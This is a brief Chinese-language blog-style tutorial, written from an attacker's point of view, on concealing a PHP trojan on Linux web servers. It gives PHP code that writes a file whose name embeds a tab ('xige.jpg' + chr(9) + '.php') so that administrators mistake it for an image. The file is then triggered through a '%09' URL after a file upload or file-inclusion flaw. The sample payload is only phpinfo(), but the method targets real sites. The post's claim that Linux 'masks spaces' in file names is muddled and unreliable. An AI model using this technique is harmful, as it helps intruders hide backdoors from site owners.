最近发现一个针对Linux的木马隐藏技术,非常的好玩。根据Linux的系统特性,经过一定的测试发现,Linux操作系对于如:xige.jpg .php类型的文件会识别为:xige.jpg类型的文件。也就是说,Linux会自动的对文件名中的空格进行屏蔽。但是php环境的网站却不会对空格进行屏蔽。这个是管理员最容易忽视的地方,所以我们只需要在访问的url页面中输入如:xige.jpg.%09.php就会变相的访问到xige.jpg .php;但是那么绕过方法就来了:
值得注意的一点是:木马的隐藏可以结合后渗透利用也可以结合文件上传配合文件包含一起利用,且针对的是Linux操作系统。
隐藏木马核心代码:
<?php
$wwwrootdir = dirname(__FILE__)."/";
file_put_contents($wwwrootdir."xige.jpg".chr(9).".php","<?php phpinfo(); ?>");
?>
假设我们上传了一个文件类容如上,同时存在文件包含漏洞。所以,包含后会存在一个xige.jpg .php文件。但是管理员却很难辨认出该木马文件,我们只需要访问的url页面中输入如:xige.jpg.%09.php就会变相的访问到xige.jpg .php,即可触发这个木马。